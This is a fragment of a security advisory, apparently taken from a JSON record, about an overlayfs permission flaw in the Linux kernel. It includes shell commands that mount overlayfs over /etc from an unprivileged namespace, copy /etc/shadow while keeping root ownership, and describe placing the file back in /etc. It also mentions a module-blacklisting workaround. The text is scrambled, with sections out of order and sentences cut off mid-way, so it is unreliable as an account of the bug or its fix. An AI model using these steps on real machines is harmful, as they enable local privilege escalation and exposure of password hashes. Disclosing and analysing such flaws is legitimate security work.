create-namespace\r\n:~# mount -t overlay -o\r\nlowerdir=/etc,upperdir=upper,workdir=work overlayfs o\r\n:~# chmod 777 work/work/\r\n:~# cd o\r\n:~/o# mv shadow copy_of_shadow\r\n(exit the namespace)\r\n:~$ ls -al upper/copy_of_shadow\r\n-rw-r- 1 root shadow 1236 May 24 15:51 upper/copy_of_shadow\r\n:~$ stat upper/copy_of_shadow /etc/shadow|grep Inode\r\nDevice: 801h/2049d Inode: 939791 Links: 1\r\nDevice: 801h/2049d Inode: 277668 Links: 1\r\n \r\nNow we can place this file in /etc by switching \"upper\" to be the lowerdir\r\noption, the permission checks pass since the file is owned by root and root\r\ncan write to /etc.\r\n \r\nserver-1504:~$. Furthermore, when a file is copied from\r\nthe lowerdir the file metadata is carbon copied, instead of attributes such as\r\nowner being changed to the user that triggered the copy_up_* procedures.\r\n \r\nExample of creating a 1:1 copy of a root-owned file:\r\n \r\n(Note that the workdir= option is not needed on older kernels)\r\n \r\n:~$. The only permissions\r\nthat are checked is if the owner of the file that is being modified has\r\npermission to write to the upperdir. When a file in the lower filesystem is accessed in a way\r\nthe requires write-access, such as opening for write access, changing\r\nsome metadata etc., the file is first copied from the lower filesystem\r\nto the upper filesystem (copy_up).\"\r\n \r\nThe ovl_copy_up_* functions do not correctly check that the user has\r\npermission to write files to the upperdir directory.
\r\n \r\nIf you don't want to update your kernel and you don't use overlayfs, a viable\r\nworkaround is to just remove or blacklist overlayfs.ko / overlay.ko.\r\n \r\nDetails\r\n=\r\n \r\n>From Documentation/filesystems/overlayfs.txt :\r\n \r\n\"Objects that are not directories (files, symlinks, device-special\r\nfiles etc.) are presented either from the upper or lower filesystem as\r\nappropriate.
This can be exploited\r\nby an unprivileged process in kernels with CONFIG_USER_NS=y and where\r\noverlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs\r\ninside unprivileged mount namespaces. , "sourceHref": "", "sourceData": "The overlayfs filesystem does not correctly check file permissions when\r\ncreating new files in the upper filesystem directory.